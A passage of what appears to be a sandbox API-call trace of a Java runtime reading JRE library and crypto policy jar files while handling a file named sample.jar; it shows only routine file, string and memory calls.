(_Size=0x66) returned 0x12ec3e00 [0110.314] wcscpy (in: _Dest=0x12ec3e00, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" [0110.314] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar", nBufferLength=0x9, lpBuffer=0x208cdc8, lpFilePart=0x208cdc0 | out: lpBuffer="", lpFilePart=0x208cdc0*=0x0) returned 0x2e [0110.314] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\rt.jar"), fInfoLevelId=0x0, lpFileInformation=0x208cb60 | out: lpFileInformation=0x208cb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8beacf, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb8beacf, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed0077b9, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x341fe37)) returned 1 [0110.315] free (_Block=0x12ec3e00) [0110.315] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned 0x2d [0110.315] malloc (_Size=0x66) returned 0x12ec3690 [0110.315] wcscpy (in: _Dest=0x12ec3690, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" [0110.315] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\rt.jar"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x2d4 [0110.316] GetFileTime (in: hFile=0x2d4, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208ccc8 | out: lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208ccc8*(dwLowDateTime=0xed0077b9, dwHighDateTime=0x1d709ec)) returned 1 [0110.316] CloseHandle (hObject=0x2d4) returned 1 [0110.316] free (_Block=0x12ec3690) [0110.316] malloc (_Size=0x2e) returned 0x12ef4250 [0110.316] _errno () returned 0x20f6be0 [0110.316] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned 0x2d [0110.316] strcpy (in: _Dest=0x208c880, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" [0110.316] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned 1 [0110.316] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned 1 [0110.316] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned 1 [0110.316] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar") returned 1 [0110.316] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar", _Str2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned -1 [0110.316] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned 0 [0110.317] free (_Block=0x12ef4250) [0110.318] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned 0x2e [0110.318] malloc (_Size=0x68) returned 0x12ec3620 [0110.318] wcscpy (in: _Dest=0x12ec3620, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" [0110.318] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar", nBufferLength=0x9, lpBuffer=0x208cdc8, lpFilePart=0x208cdc0 | out: lpBuffer="", lpFilePart=0x208cdc0*=0x0) returned 0x2f [0110.318] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\jce.jar"), fInfoLevelId=0x0, lpFileInformation=0x208cb60 | out: lpFileInformation=0x208cb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb45a81e, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb45a81e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb45b939, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1c3c3)) returned 1 [0110.318] free (_Block=0x12ec3620) [0110.319] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned 0x2e [0110.319] malloc (_Size=0x68) returned 0x12ec3620 [0110.319] wcscpy (in: _Dest=0x12ec3620, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" [0110.319] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\jce.jar"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x2d4 [0110.319] GetFileTime (in: hFile=0x2d4, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208ccc8 | out: lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208ccc8*(dwLowDateTime=0xeb45b939, dwHighDateTime=0x1d709ec)) returned 1 [0110.319] CloseHandle (hObject=0x2d4) returned 1 [0110.319] free (_Block=0x12ec3620) [0110.319] malloc (_Size=0x2f) returned 0x12ef3b50 [0110.319] _errno () returned 0x20f6be0 [0110.320] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned 0x2e [0110.320] strcpy (in: _Dest=0x208c880, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" [0110.320] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned 1 [0110.320] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned 1 [0110.320] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned 0 [0110.320] free (_Block=0x12ef3b50) [0110.320] malloc (_Size=0x48) returned 0x12ef3510 [0110.321] malloc (_Size=0xa0) returned 0x12324960 [0110.321] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1af4c, lpNewFilePointer=0x208d5a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d5a0*=110412) returned 1 [0110.321] ReadFile (in: hFile=0x2c8, lpBuffer=0x12324960, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d570, lpOverlapped=0x0 | out: lpBuffer=0x12324960*, lpNumberOfBytesRead=0x208d570*=0xa0, lpOverlapped=0x0) returned 1 [0110.321] malloc (_Size=0x1a) returned 0x12ef0f30 [0110.322] free (_Block=0x12ef1050) [0110.323] free (_Block=0x12ef34c0) [0110.323] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar") returned 0x55 [0110.323] malloc (_Size=0xb6) returned 0x12ee8c10 [0110.323] wcscpy (in: _Dest=0x12ee8c10, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar" [0110.323] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar", nBufferLength=0x9, lpBuffer=0x208def8, lpFilePart=0x208def0 | out: lpBuffer="", lpFilePart=0x208def0*=0x0) returned 0x56 [0110.323] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\us_export_policy.jar"), fInfoLevelId=0x0, lpFileInformation=0x208dc90 | out: lpFileInformation=0x208dc90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb489f40, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb489f40, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb489f40, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xbcf)) returned 1 [0110.325] free (_Block=0x12ee8c10) [0110.326] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar") returned 0x51 [0110.326] malloc (_Size=0xae) returned 0x12ee8b50 [0110.326] wcscpy (in: _Dest=0x12ee8b50, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar" [0110.326] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar", nBufferLength=0x9, lpBuffer=0x208def8, lpFilePart=0x208def0 | out: lpBuffer="", lpFilePart=0x208def0*=0x0) returned 0x52 [0110.326] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\local_policy.jar"), fInfoLevelId=0x0, lpFileInformation=0x208dc90 | out: lpFileInformation=0x208dc90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb489f40, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb489f40, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb489f40, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xbdb)) returned 1 [0110.326] free (_Block=0x12ee8b50) [0110.327] strlen (_Str="javax/crypto/CryptoPermissions.class") returned 0x24 [0110.327] strlen (_Str="javax/crypto/CryptoPermissions.class") returned 0x24 [0110.327] malloc (_Size=0x48) returned 0x12ef2d40 [0110.327] malloc (_Size=0xa0) returned 0x123246a0 [0110.327] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1bfec, lpNewFilePointer=0x208cf90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf90*=114668) returned 1 [0110.327] ReadFile (in: hFile=0x2c8, lpBuffer=0x123246a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cf60, lpOverlapped=0x0 | out: lpBuffer=0x123246a0*, lpNumberOfBytesRead=0x208cf60*=0xa0, lpOverlapped=0x0) returned 1 [0110.327] malloc (_Size=0x25) returned 0x12ef0f90 [0110.330] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar") returned 0x55 [0110.330] malloc (_Size=0xb6) returned 0x12ee8c10 [0110.330] wcscpy (in: _Dest=0x12ee8c10, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar" [0110.330] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\us_export_policy.jar"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x2d4 [0110.331] GetFileTime (in: hFile=0x2d4, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208dcf8 | out: lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x208dcf8*(dwLowDateTime=0xeb489f40, dwHighDateTime=0x1d709ec)) returned 1 [0110.331] CloseHandle (hObject=0x2d4) returned 1 [0110.331] free (_Block=0x12ee8c10) [0110.331] malloc (_Size=0x56) returned 0x12ec54e0 [0110.331] _errno () returned 0x20f6be0 [0110.331] strlen (_Str="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar") returned 0x55 [0110.331] strcpy (in: _Dest=0x208d8b0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar" [0110.331] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned 1 [0110.331] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned 1 [0110.331] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned 1 [0110.331] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar") returned 1 [0110.331] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar", _Str2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\sample.jar") returned -1 [0110.332] strcmp (_Str1="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned 1 [0110.332] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar") returned 0x55 [0110.332] malloc (_Size=0xb6) returned 0x12ee8c10 [0110.332] wcscpy (in: _Dest=0x12ee8c10, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar" [0110.332] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\US_export_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\security\\policy\\unlimited\\us_export_policy.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0110.332] free (_Block=0x12ee8c10) [0110.332] calloc (_Count=0x1, _Size=0xa8) returned 0x123243e0 [0110.332] ReadFile (in: hFile=0x2d4, lpBuffer=0x208db90, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x208db40, lpOverlapped=0x0 | out: lpBuffer=0x208db90*, lpNumberOfBytesRead=0x208db40*=0x4, lpOverlapped=0x0) returned 1 [0110.338] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x208db70, dwMoveMethod=0x2 | out: lpNewFilePointer=0x208db70*=3023) returned 1 [0110.338] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xb4f, lpNewFilePointer=0x208d940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d940*=2895) returned 1 [0110.338] ReadFile (in: hFile=0x2d4, lpBuffer=0x208d9a0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x208d910, lpOverlapped=0x0 | out: lpBuffer=0x208d9a0*, lpNumberOfBytesRead=0x208d910*=0x80, lpOverlapped=0x0) returned 1 [0110.340] strlen (_Str="java/util/jar/JarFile$JarEntryIterator.class") returned 0x2c [0110.340] malloc (_Size=0x48) returned 0x12ef2d90 [0110.340] malloc (_Size=0xa0) returned 0x12324070 [0110.340] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ede5a, lpNewFilePointer=0x208ceb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ceb0*=54451802) returned 1 [0110.340] ReadFile (in: hFile=0x134, lpBuffer=0x12324070, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce80, lpOverlapped=0x0 | out: lpBuffer=0x12324070*, lpNumberOfBytesRead=0x208ce80*=0xa0, lpOverlapped=0x0) returned 1 [0110.341] malloc (_Size=0x2d) returned 0x12ef43d0 [0110.348] malloc (_Size=0x48) returned 0x12ef34c0 [0110.348] malloc (_Size=0x197) returned 0x1221ba40 [0110.348] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xa38, lpNewFilePointer=0x208db30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208db30*=2616) returned 1 [0110.348] ReadFile (in: hFile=0x2d4, lpBuffer=0x1221ba40, nNumberOfBytesToRead=0x197, lpNumberOfBytesRead=0x208db00, lpOverlapped=0x0 | out: lpBuffer=0x1221ba40*, lpNumberOfBytesRead=0x208db00*=0x197, lpOverlapped=0x0) returned 1 [0110.348] free (_Block=0x0) [0110.348] malloc (_Size=0x15) returned 0x12edc7f0 [0110.350] malloc (_Size=0x48) returned 0x12ef2c50 [0110.350] malloc (_Size=0x15) returned 0x12edc630 [0110.350] free (_Block=0x12edc7f0) [0110.351] free (_Block=0x12ef34c0) [0110.351] malloc (_Size=0x48) returned 0x12ef34c0 [0110.351] malloc (_Size=0x16) returned 0x12edc4f0 [0110.351] free (_Block=0x12edc630) [0110.351] free (_Block=0x12ef2c50) [0110.352] malloc (_Size=0x48) returned 0x12ef2fc0 [0110.352] malloc (_Size=0xa) returned 0x12edc910 [0110.352] free (_Block=0x12edc4f0) [0110.352] free (_Block=0x12ef34c0) [0110.353] malloc (_Size=0x48) returned 0x12ef3060 [0110.353] malloc (_Size=0x19) returned 0x12ef1140 [0110.353] free (_Block=0x12edc910) [0110.353] free (_Block=0x121a5650) [0110.353] free (_Block=0x12ef2fc0) [0110.354] malloc (_Size=0x48) returned 0x12ef2fc0 [0110.354] malloc (_Size=0xa0) returned 0x12324960 [0110.354] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xa38, lpNewFilePointer=0x208d5f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d5f0*=2616) returned 1 [0110.354] ReadFile (in: hFile=0x2d4, lpBuffer=0x12324960, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d5c0, lpOverlapped=0x0 | out: lpBuffer=0x12324960*, lpNumberOfBytesRead=0x208d5c0*=0xa0, lpOverlapped=0x0) returned 1 [0110.354] malloc (_Size=0x15) returned 0x12edc690 [0110.355] free (_Block=0x12ef1140) [0110.355] free (_Block=0x12ef3060) [0110.355] calloc (_Count=0x1, _Size=0x58) returned 0x12ee9a40 [0110.355] malloc (_Size=0x1bf0) returned 0x12eea380 [0110.356] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x208b820, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b820*=0) returned 1 [0110.356] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b870, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b7f0, lpOverlapped=0x0 | out: lpBuffer=0x208b870*, lpNumberOfBytesRead=0x208b7f0*=0x1e, lpOverlapped=0x0) returned 1 [0110.356] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x32, lpNewFilePointer=0x208b880, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b880*=50) returned 1 [0110.356] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b990, nNumberOfBytesToRead=0xe5, lpNumberOfBytesRead=0x208b850, lpOverlapped=0x0 | out: lpBuffer=0x208b990*, lpNumberOfBytesRead=0x208b850*=0xe5, lpOverlapped=0x0) returned 1 [0110.357] malloc (_Size=0x8000) returned 0x12ef5680 [0110.385] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x32, lpNewFilePointer=0x208b930, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b930*=50) returned 1 [0110.386] ReadFile (in: hFile=0x2d4, lpBuffer=0x208ba40, nNumberOfBytesToRead=0xe5, lpNumberOfBytesRead=0x208b900, lpOverlapped=0x0 | out: lpBuffer=0x208ba40*, lpNumberOfBytesRead=0x208b900*=0xe5, lpOverlapped=0x0) returned 1 [0110.387] malloc (_Size=0x48) returned 0x12ef34c0 [0110.387] malloc (_Size=0xa0) returned 0x12324540 [0110.387] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xa7a, lpNewFilePointer=0x208d710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d710*=2682) returned 1 [0110.387] ReadFile (in: hFile=0x2d4, lpBuffer=0x12324540, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d6e0, lpOverlapped=0x0 | out: lpBuffer=0x12324540*, lpNumberOfBytesRead=0x208d6e0*=0xa0, lpOverlapped=0x0) returned 1 [0110.387] malloc (_Size=0x15) returned 0x12edc310 [0110.387] free (_Block=0x12edc690) [0110.388] free (_Block=0x12ef2fc0) [0110.389] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x127, lpNewFilePointer=0x208b8d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8d0*=295) returned 1 [0110.389] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b920, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b8a0, lpOverlapped=0x0 | out: lpBuffer=0x208b920*, lpNumberOfBytesRead=0x208b8a0*=0x1e, lpOverlapped=0x0) returned 1 [0110.389] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x159, lpNewFilePointer=0x208b930, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b930*=345) returned 1 [0110.389] ReadFile (in: hFile=0x2d4, lpBuffer=0x208ba40, nNumberOfBytesToRead=0x132, lpNumberOfBytesRead=0x208b900, lpOverlapped=0x0 | out: lpBuffer=0x208ba40*, lpNumberOfBytesRead=0x208b900*=0x132, lpOverlapped=0x0) returned 1 [0110.392] malloc (_Size=0x48) returned 0x12ef2fc0 [0110.392] malloc (_Size=0xa0) returned 0x123246a0 [0110.392] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xabc, lpNewFilePointer=0x208d710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d710*=2748) returned 1 [0110.392] ReadFile (in: hFile=0x2d4, lpBuffer=0x123246a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d6e0, lpOverlapped=0x0 | out: lpBuffer=0x123246a0*, lpNumberOfBytesRead=0x208d6e0*=0xa0, lpOverlapped=0x0) returned 1 [0110.392] malloc (_Size=0x16) returned 0x12edc830 [0110.392] free (_Block=0x12edc310) [0110.393] free (_Block=0x12ef34c0) [0110.394] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x29b, lpNewFilePointer=0x208b8d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8d0*=667) returned 1 [0110.394] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b920, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b8a0, lpOverlapped=0x0 | out: lpBuffer=0x208b920*, lpNumberOfBytesRead=0x208b8a0*=0x1e, lpOverlapped=0x0) returned 1 [0110.394] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x2ce, lpNewFilePointer=0x208b930, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b930*=718) returned 1 [0110.394] ReadFile (in: hFile=0x2d4, lpBuffer=0x208ba40, nNumberOfBytesToRead=0x52a, lpNumberOfBytesRead=0x208b900, lpOverlapped=0x0 | out: lpBuffer=0x208ba40*, lpNumberOfBytesRead=0x208b900*=0x52a, lpOverlapped=0x0) returned 1 [0110.410] strlen (_Str="java/security/interfaces/RSAPublicKey") returned 0x25 [0110.411] strlen (_Str="java/security/interfaces/RSAPrivateKey") returned 0x26 [0110.411] strlen (_Str="sun/security/rsa/RSASignature$SHA256withRSA") returned 0x2b [0110.412] strlen (_Str="sun/security/rsa/RSASignature$SHA256withRSA.class") returned 0x31 [0110.412] malloc (_Size=0x48) returned 0x12ef2980 [0110.412] malloc (_Size=0xa0) returned 0x123246a0 [0110.412] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33df6cc, lpNewFilePointer=0x208cc90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc90*=54392524) returned 1 [0110.412] ReadFile (in: hFile=0x134, lpBuffer=0x123246a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cc60, lpOverlapped=0x0 | out: lpBuffer=0x123246a0*, lpNumberOfBytesRead=0x208cc60*=0xa0, lpOverlapped=0x0) returned 1 [0110.412] malloc (_Size=0x32) returned 0x12ef3b50 [0110.414] strlen (_Str="sun/security/provider/SHA2$SHA256") returned 0x21 [0110.415] strlen (_Str="sun/security/provider/SHA2$SHA256.class") returned 0x27 [0110.416] malloc (_Size=0x48) returned 0x12ef2c50 [0110.416] malloc (_Size=0xa0) returned 0x12324070 [0110.416] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33dce8b, lpNewFilePointer=0x208c1b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c1b0*=54382219) returned 1 [0110.416] ReadFile (in: hFile=0x134, lpBuffer=0x12324070, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c180, lpOverlapped=0x0 | out: lpBuffer=0x12324070*, lpNumberOfBytesRead=0x208c180*=0xa0, lpOverlapped=0x0) returned 1 [0110.416] malloc (_Size=0x28) returned 0x12ef11a0 [0110.438] malloc (_Size=0x48) returned 0x12ef31a0 [0110.438] malloc (_Size=0x95) returned 0x12ed5160 [0110.438] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xb3a, lpNewFilePointer=0x208d810, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d810*=2874) returned 1 [0110.438] ReadFile (in: hFile=0x2d4, lpBuffer=0x12ed5160, nNumberOfBytesToRead=0x95, lpNumberOfBytesRead=0x208d7e0, lpOverlapped=0x0 | out: lpBuffer=0x12ed5160*, lpNumberOfBytesRead=0x208d7e0*=0x95, lpOverlapped=0x0) returned 1 [0110.438] malloc (_Size=0x19) returned 0x12ef1080 [0110.438] strlen (_Str="sun/security/provider/SHA2$SHA256") returned 0x21 [0110.443] strlen (_Str="javax/crypto/CryptoPolicyParser.class") returned 0x25 [0110.443] strlen (_Str="javax/crypto/CryptoPolicyParser.class") returned 0x25 [0110.443] malloc (_Size=0x48) returned 0x12ef31f0 [0110.443] malloc (_Size=0xa0) returned 0x12324960 [0110.443] SetFilePointerEx (in: 